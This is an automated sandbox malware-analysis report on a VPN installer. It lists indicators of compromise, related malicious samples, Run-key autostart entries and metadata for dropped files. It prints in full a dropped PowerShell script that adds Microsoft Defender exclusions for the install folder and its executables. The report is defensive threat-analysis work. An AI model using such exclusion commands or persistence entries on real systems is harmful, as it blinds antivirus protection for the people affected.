Classification:	mal60.spre.troj.spyw.evad.winEXE@98/285@9/10
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, consent.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.153.25.42, 2.23.209.140, 2.23.209.176, 2.23.209.150, 2.23.209.158, 2.23.209.177, 2.23.209.179, 2.23.209.182, 2.23.209.149, 2.23.209.133
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, in-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, in1-gw2-04-3d6c3051.eastus2.cloudapp.azure.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:30:35	API Interceptor	5333881x Sleep call for process: uc_ctrl.exe modified
10:31:28	API Interceptor	1431601x Sleep call for process: LetsPRO.exe modified
16:30:39	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" /silent
16:30:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" /silent

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
183.60.146.66	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	lets-test.msi	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
103.235.47.188	6o63snaetO.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	http://metamask-zhwallet.org/	Get hash	malicious	Unknown	Browse	www.baidu.com/img/flexible/logo/plus_logo_web_2.png
	ViKing-R2.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	ViKing-R2.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	Tas8.dll	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
	Tas10_WL.dll	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
	Tas10.dll	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
23.98.101.155	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	lets-test.msi	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.wshifen.com	KLL_1.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	KLL.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	#U65b9#U6848#U7f16#U53f7FAI2-#U7b2c#U4e8c#U6279#U6b21(1).exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	KLL_1.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	KLL.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	lets-test.msi	Get hash	malicious	Unknown	Browse	103.235.46.96
	yG5JwI8M2H.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	AAq2b5KtWK.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	zx.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com	KLL_1.exe	Get hash	malicious	Unknown	Browse	18.139.169.84
	KLL.exe	Get hash	malicious	Unknown	Browse	18.139.183.38
	KLL_1.exe	Get hash	malicious	Unknown	Browse	18.136.78.90
	KLL.exe	Get hash	malicious	Unknown	Browse	18.136.78.90
	lets-test.msi	Get hash	malicious	Unknown	Browse	54.169.168.67
	zx.exe	Get hash	malicious	Unknown	Browse	52.220.169.49
	zx.exe	Get hash	malicious	Unknown	Browse	52.220.169.49
	zx.exe	Get hash	malicious	Unknown	Browse	52.220.169.49
	zx.exe	Get hash	malicious	Unknown	Browse	54.169.173.39
d1dmgcawtbm6l9.cloudfront.net	KLL_1.exe	Get hash	malicious	Unknown	Browse	108.138.24.182
	KLL.exe	Get hash	malicious	Unknown	Browse	108.138.24.227
	KLL_1.exe	Get hash	malicious	Unknown	Browse	108.138.24.115
	KLL.exe	Get hash	malicious	Unknown	Browse	108.138.24.115
	lets-test.msi	Get hash	malicious	Unknown	Browse	3.164.160.102
	zx.exe	Get hash	malicious	Unknown	Browse	18.239.15.216
	zx.exe	Get hash	malicious	Unknown	Browse	3.164.160.24
	zx.exe	Get hash	malicious	Unknown	Browse	108.138.24.13
	zx.exe	Get hash	malicious	Unknown	Browse	108.138.24.227
nal.fqoqehwib.com	KLL_1.exe	Get hash	malicious	Unknown	Browse	104.112.172.245
	KLL.exe	Get hash	malicious	Unknown	Browse	5.217.108.181
	KLL_1.exe	Get hash	malicious	Unknown	Browse	10.176.38.125
	KLL.exe	Get hash	malicious	Unknown	Browse	104.112.172.245
	lets-test.msi	Get hash	malicious	Unknown	Browse	104.112.172.245
	zx.exe	Get hash	malicious	Unknown	Browse	33.86.72.19
	zx.exe	Get hash	malicious	Unknown	Browse	99.34.124.121
	zx.exe	Get hash	malicious	Unknown	Browse	99.34.124.121
	zx.exe	Get hash	malicious	Unknown	Browse	99.34.124.121

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN	KLL_1.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
	KLL.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
	KLL_1.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
	KLL.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
	SecuriteInfo.com.not-a-virus.HEUR.Downloader.Win32.Duba.gen.28830.27730.exe	Get hash	malicious	Unknown	Browse	183.61.243.1
	lets-test.msi	Get hash	malicious	Unknown	Browse	183.60.146.66
	zx.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
	zx.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
	zx.exe	Get hash	malicious	Unknown	Browse	183.60.146.66
BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	KLL_1.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	KLL.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	#U65b9#U6848#U7f16#U53f7FAI2-#U7b2c#U4e8c#U6279#U6b21(1).exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	KLL_1.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	KLL.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	SecuriteInfo.com.HEUR.Trojan.Win32.Vilsel.gen.29367.31531.exe	Get hash	malicious	Unknown	Browse	180.76.118.5
	lets-test.msi	Get hash	malicious	Unknown	Browse	103.235.46.96
	yG5JwI8M2H.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	AAq2b5KtWK.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
DXTL-HKDXTLTseungKwanOServiceHK	KLL.exe	Get hash	malicious	Unknown	Browse	154.204.0.4
	KLL.exe	Get hash	malicious	Unknown	Browse	154.204.0.4
	SC61092U5IO.exe	Get hash	malicious	FormBook	Browse	154.214.114.86
	LSW7109326UNI0.exe	Get hash	malicious	FormBook	Browse	154.214.114.86
	Fatura20240617.exe	Get hash	malicious	FormBook	Browse	154.214.114.86
	SC61092U5IO.exe	Get hash	malicious	FormBook	Browse	154.214.114.86
	zx.exe	Get hash	malicious	Unknown	Browse	154.204.0.4
	zx.exe	Get hash	malicious	Unknown	Browse	154.204.0.4
	zx.exe	Get hash	malicious	Unknown	Browse	154.204.0.7
AMAZON-02US	file.exe	Get hash	malicious	Unknown	Browse	143.204.215.105
	file.exe	Get hash	malicious	Unknown	Browse	143.204.215.105
	file.exe	Get hash	malicious	Unknown	Browse	143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	143.204.215.122
	KLL_1.exe	Get hash	malicious	Unknown	Browse	18.139.169.84
	file.exe	Get hash	malicious	Unknown	Browse	143.204.215.122
	KLL.exe	Get hash	malicious	Unknown	Browse	108.138.24.227
	file.exe	Get hash	malicious	Unknown	Browse	143.204.215.122
	KLL_1.exe	Get hash	malicious	Unknown	Browse	18.136.78.90

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\letsvpn\LetsPRO.exe	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	KuaiVpn-n.msi	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\letsvpn\Update.exe	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	KLL_1.exe	Get hash	malicious	Unknown	Browse
	KLL.exe	Get hash	malicious	Unknown	Browse
	KuaiVpn-n.msi	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse
	zx.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	318
Entropy (8bit):	4.740682303463164
Encrypted:	false
SSDEEP:	6:IPeGgdEYC5BeGgdEEFmJovkBPeGgdEEFrGvkBPeGgdEEFwn0ZkBPeGgdEEFQr4MF:ISuFAuEcJxSuEJGQSuEyPSuESr1SuE6
MD5:	B34636A4E04DE02D079BA7325E7565F0
SHA1:	F32C1211EAC22409BB195415CB5A8063431F75CD
SHA-256:	A9901397D39C0FC74ADFDB95DD5F95C3A14DEF3F9D58EF44AB45FC74A56D46DF
SHA-512:	6EB3255E3C89E2894F0085095FB5F6AB97349F0ED63C267820C82916F43A0AC014A94F98C186FF5D54806469A00C3C700A34D26DE90AFB090B80AC824A05AA2F
Malicious:	false
Preview:	Add-MpPreference -ExclusionPath "C:\Program Files (x86)\letsvpn"..Add-MpPreference -ExclusionProcess "LetsPRO.exe"..Add-MpPreference -ExclusionProcess "tapinstall.exe"..Add-MpPreference -ExclusionProcess "uninst.exe"..Add-MpPreference -ExclusionProcess "Update.exe"..Add-MpPreference -ExclusionProcess "ndp462-web.exe"

C:\Program Files (x86)\letsvpn\LetsPRO.exe

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	247272
Entropy (8bit):	6.894684781286516
Encrypted:	false
SSDEEP:	6144:eZzvhs2Z4n1E7g34XtVYAOfTdxz44JsQwOURhw:eJ+2Z4nShVY5HUEUnw
MD5:	8FC872149F0B8D2FB3D75C4076C0A8CA
SHA1:	D31CF6784649D805F7A994C9E9B72FFB2E1920DC
SHA-256:	869448B4FCD15473FE4FDC9DBBF05FCFA154B854231CCE94858B4BD7B196C13A
SHA-512:	77A225866574C2AE296E61DB1AEFD193D5766A1DF0E5B36C7BAC657958BDFDC7CCFFF85FE2B3E7CCBBDB482EE82B1FABC753042494B16BE0DF74EA96D87E65C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: KLL_1.exe, Detection: malicious, Browse Filename: KLL.exe, Detection: malicious, Browse Filename: KLL_1.exe, Detection: malicious, Browse Filename: KLL.exe, Detection: malicious, Browse Filename: KuaiVpn-n.msi, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_............................+.............@.......................................@.....................................<.......L................+.......!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...L...........................@..@.reloc...!......."...x..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\Update.exe

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1910760
Entropy (8bit):	5.9104950900062425
Encrypted:	false
SSDEEP:	24576:xWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2X5l:Mt3UCiag6CKM2zCyZuOjJaxSS5qhr
MD5:	10A090D9B59FBBB404DD4DA233E3BA5B
SHA1:	AD683C9CA3D59F45DC0FB587B88B9B7B92B3118F
SHA-256:	677C41FDBD8E90CCCB5AD0CA4C9313AAA96337405365E3DD39313EF9B99A93AC
SHA-512:	A4F70D0E16AC80ECADB03715D7C47CCB47AF248544CC936CEB7B06B1D08B3C84FB5C6618F5520A759089006D5926B9B843AE0499C5A68EDB8F208A091CA94845
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\Update.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: KLL_1.exe, Detection: malicious, Browse Filename: KLL.exe, Detection: malicious, Browse Filename: KLL_1.exe, Detection: malicious, Browse Filename: KLL.exe, Detection: malicious, Browse Filename: KuaiVpn-n.msi, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse Filename: zx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`.......\....@.....................................W.... ...................+...@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{......{......{....r.(......}......}......}........0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o.......0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(........{......{....

C:\Program Files (x86)\letsvpn\app-3.7.0\CommunityToolkit.Mvvm.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	113128
Entropy (8bit):	6.310120137379966
Encrypted:	false
SSDEEP:	1536:cARI0MvSAA6U7ks4jhOWE8i6wrNMRjYAZlfNASZfSOi3qAwrxX:cWMpA6Agg8ahQYAZlFnUqhR
MD5:	08C367733CD7D3C92F8E7838DA655A44
SHA1:	CA27248645DA63062337FBBB52A84E014250DC62
SHA-256:	DB8D8E2189B9C74952D5DB987224E6084CE3B0013516A613D3AF22C2E626B2C2
SHA-512:	46365E91A00274F6FE180E312CA3E3358A211B5566929F66FC2125BE7F431712D65DBBE61003FC3A309EB69544DC61C99734330A0BB6899563E505136463F7B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..~............... ........... ...............................<....`.................................a...O........................+..............T............................................ ............... ..H............text....\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.........................................................................{9.....{:...V.(;.....}9.....}:......0..A........u#.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...... ..1 )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X...0..b........r...p......%..{9......%q&....&...-.&.+...&...oB....%..{:......%q'....'...-.&.+...'...oB....(C.....{D.....{E...V.(;.....}D.....}E....0..A........u(.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...... ...[ )UU.

C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.MsDelta.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.942098509975081
Encrypted:	false
SSDEEP:	384:qu/ZC45lG1SpwKANynsAw/98E9VF3AM+ozD4Dmr:V/Z/loAw/KENAMxzLr
MD5:	DDE518AB3D3F80D4D7C7F3ABF26A4315
SHA1:	22B9F0AFBFB639D6F624E4049B4D29CCA349219E
SHA-256:	75F97A89EB8D78034FA6511DF14C73C7FAFF4AC34F63E11ECAEFA97AA44291A4
SHA-512:	C74E9E0869234DABC125505C9C89BC7B8A16341500F649F288FB93A5A17D9FBED20034D5227463FB1588D403201924794FDEF570A461E4A99BEE308BF9A8059F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................-... ...@....... ....................................@..................................,..S....@...................+...`.......+............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......$!..l...................P .......................................h....X\|f.........+.j$....r.~.3i....m2.....'.\|..OZ.ep..)t?...P6c.<<Qe.M...M.0.B.(+.v.Kk!...Y.....H..7r.[(.r....J_.!.....l.0..,...............~.......j.j.j....... .(....-.s....zN.j...(....-.s....z..(....*BSJB............v2.0.50727......l.......#~..(... ...#Strings....H.......#US.P.......#GUID...`.......#Blob...........W?........%3....................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.PatchApi.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.956445953667057
Encrypted:	false
SSDEEP:	384:P4TdwlzpwKANynsAw/98E9VF3AM+oh2tuHGq:GdjAw/KENAMxIuh
MD5:	05EEDB6A8F92D9E0991BAEABAA09A1DE
SHA1:	41139C70A16A8465738DAF3771603985D77B0B32
SHA-256:	33F72F1482A5D3D1397A306041E062BDBE029A9C0C0021D86EDAE64FBA9FF00F
SHA-512:	A57D0BD14FB0FA9D8A4B153F4CC276AC2106717BA4FA93B762760D63E2860EDB6BD9760CF45580263D431626A95F46816DFCB0D6FC6CED3F23ECAE409C0298BD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................... ...@....... ...................................@....................................K....@...................+...`......H)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.......................H........!..D...................P .......................................!{.`DzN?...dr..1..9..NN/...[..t...2......C.......x..YCU......=....{.9W.J......^S.N;...iY........RBA......{..u..\~..1/M..^....~....(....-.s....zJ....(....-.s....z..(.....BSJB............v2.0.50727......l.......#~......`...#Strings....\|.......#US.........#GUID...........#Blob...........G7........%3......................................................................y............... .......y.....

C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	15848
Entropy (8bit):	6.926566591160178
Encrypted:	false
SSDEEP:	192:xYN8B5+pPIKfhigcNynC5c77bgfU5izh/y2sE9jBF3A5K+org2J0y0tW:xYM5+pwKANynsAw/98E9VF3AM+orLiW
MD5:	79FD69F0B9A830A79DF9F8BC2B5BFC10
SHA1:	856174B9681CE4E6A3577D648E62E7EA0AC749D6
SHA-256:	8AFE7BC000819C896A43DAF819EDA166F9CA1CD671F91652015B636EF7ED2863
SHA-512:	1E8B9E56393F830DF94C5FAABC546448457E94C947C15DF154C7339A618521FED97F0A8182FB1169361F69DD0E48C867314AD4A731DD4EDEDF37057B6BFF1FEA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................(... ...@....... ....................................@..................................'..W....@...................+...`.......&............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H........ ......................P ......................................%.&...Fm........f...Dj..[..(...:w........s4H.. ...p.+^z...;_....~.k...\|... ..q..+.cv.VZ.A.[[\|..m.0...w.._m.<0...d-.[.R.BSJB............v2.0.50727......l.......#~...... ...#Strings.... .......#US.(.......#GUID...8.......#Blob...........G.........%3............................................................................3.....G.....U.....n.........'...................................%.7.........

C:\Program Files (x86)\letsvpn\app-3.7.0\FontAwesome.WPF.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	220648
Entropy (8bit):	7.172693296669628
Encrypted:	false
SSDEEP:	6144:+YP7/P97ilHDqO01ktQOzB4YjDnX08RYA3fP5SRhS:+YPpilHD+kQA4uk8RYA3fmS
MD5:	31B3A8A6C1DD13132C1D7C114DDEAE98
SHA1:	8E1531B42FAE1BFF7D43F4256A57AF67A075CAFC
SHA-256:	96CF524DD5DD3EADAE022DF9B7D9F9289600FE8F3B24969EBD90BC21C1A7312F
SHA-512:	2CCA6FF092C835CD1C66773113828F6FAFFD0CFED309DA45ADD6DA9CD1EBE3486C9A58293AFA758E1A5BA13FEA847B1AA6EF2839D2351F842C63E927E1A22E49
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....nX...........!.....(...........G... ........@.. ....................................@.................................`G..K....`...............2...+...........F............................................... ............... ..H............text....'... ...(.................. ..`.rsrc........`.....................@..@.reloc...............0..............@..B.................G......H........C..............D1......LC......................................F.~....o...........J.~..........o......0..E........u....-..t.......(....u....-...(............~....o...........o........0..T.......r...ps....re..ps.........r...p.....(.........(.................s....s....(.........*.0..G.............o....u....%-.&s......o....(...+(...+..,..#........o....+G.o....#........s....o...........o..........#.......?#.......?s....o....s.....s....%#........s....o....% h...ls...

C:\Program Files (x86)\letsvpn\app-3.7.0\Hardcodet.Wpf.TaskbarNotification.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	56296
Entropy (8bit):	6.198513563770946
Encrypted:	false
SSDEEP:	768:/fgAOG37OIh4Pqr8OvsQu4wwC9ZBMGAw/KENAMxQ41c:/fgng6Ie1OvI4wwC98GAwrxQn
MD5:	6465D2200CA37801DD31FC6E0F13D2EA
SHA1:	2CEA26B57815A280C8F88E11FB79D9522A3F9502
SHA-256:	43BADBC579709A45C89955ACFA4C4ADBCF37F5D455F6A759D62BA09BE051B4A4
SHA-512:	D45FE7401C4814C1F2BA24A26678ED4E6A137B5468A02C97924BAFD1F8B5ABF3D272513093954EE0CBBF5E4A54D34E5CE9A1F30ABCC411EE0D0371416A8A68BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Kn.V...........!..................... ........... ....................... .......R....`.....................................O.......X................+........................................................... ............... ..H............text........ ...................... ..`.rsrc...X...........................@..@.reloc..............................@..B........................H........O...s...........................................................0..b............(....-P....=....s......o....o.......(.....o....o.......(....s....s............,..o.....~..............7R.......0..).......(.......(....-.#.......?..( ......(!.......0..).......(.......(....-.#.......?..( ......("...*....0............s......o.....o...........o....-...(#....X...($.....+p.o.....3...(#......($.....(%...Y.Y..+J.o.....3...(#......(&.....(%...X.X..+$.o.....3...(#.....('...Y.

C:\Program Files (x86)\letsvpn\app-3.7.0\ICSharpCode.AvalonEdit.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	628712
Entropy (8bit):	6.139135987986315
Encrypted:	false
SSDEEP:	6144:ITTh6UXqQ0l0l2b4GQnn9lXNbOpIeQjDfjJcxm04FSh+0Nsj8X+iKbH2YjotRhu:waQ0SnPNb8IbJImZo4L+u
MD5:	98AEB224BD1555D587560402959438A5
SHA1:	3FB9F2E31DFDB8791547C4AFF465BCDB9E3094FC
SHA-256:	62D37FF40136DD7DE542010464B6F6F70E98B056B3A57FB45E709AF2FD41DE4E
SHA-512:	5A6E51F1300F78309C378DF6807A86EE1C4DAECE66AFA722BD8102923C652F898E8494F96BE6058865DB8DAC6E1DE85071AFA846D47C3EBB2DE96A4316A36DC6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....L..........." ..0..b.............. ........... ....................................`.....................................O....................l...+..............T............................................ ............... ..H............text....`... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B.......................H...........<N...........a..`...(.........................................{w.....{x...V.(y.....}w.....}x......0..;........u;.....,/(z....{w....{w...o{...,.(\|....{x....{x...o}..... .7.^ )UU.Z(z....{w...o~...X )UU.Z(\|....{x...o....X.0...........r...p......%..{w..........>.....>...-.q>........>...-.&.+...>...o.....%..{x..........?.....?...-.q?........?...-.&.+...?...o.....(......{......{....V.(y.....}......}.......0..;........u@.....,/(z....{.....{....o{...,.(\|....{...

C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1471464
Entropy (8bit):	6.909759686698742
Encrypted:	false
SSDEEP:	24576:RKHzzSw672M9dzY9QV+baTAjHtKfYqu9D:RvCM9H+bYktuja
MD5:	D664FB656FC05BE54EA49950688BE980
SHA1:	98B18B4485C0074F868BCF476C413F64FBEB7A15
SHA-256:	141B71A28B0D4ED9B8586BE50842CD1B32F2C86EB389444D39DB3AFC47AE8EDF
SHA-512:	31C4365D655D54B94D9D1BA4B5A987372742D19F3867FFA26F88193C0E76CE2FBB78D006EDF6BC97435C4E1F2F7CC6A04B8CAB6B5AF641E95CFB5CA54DF9587D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p............"...0.................. ........@.. ....................................`.....................................O.......P............H...+..........D...8............................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc...............F..............@..B.......................H........b..X...........L.................................................{.....{+...V.(,.....}.....}+......0..A........u........4.,/(-....{....{...o....,.(/....{+....{+...o0...... .z.. )UU.Z(-....{...o1...X )UU.Z(/....{+...o2...X...0..b........r...p......%..{......%q.........-.&.+.......o3....%..{+......%q.........-.&.+.......o3....(4.....(5...^.(5..........%...}....:.(5.....}....:.(5.....}....:.(,.....}......(6.....(7.....J.{....%-.&.o8.....(5...*:.(

C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe.config

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	22737
Entropy (8bit):	5.008129188489306
Encrypted:	false
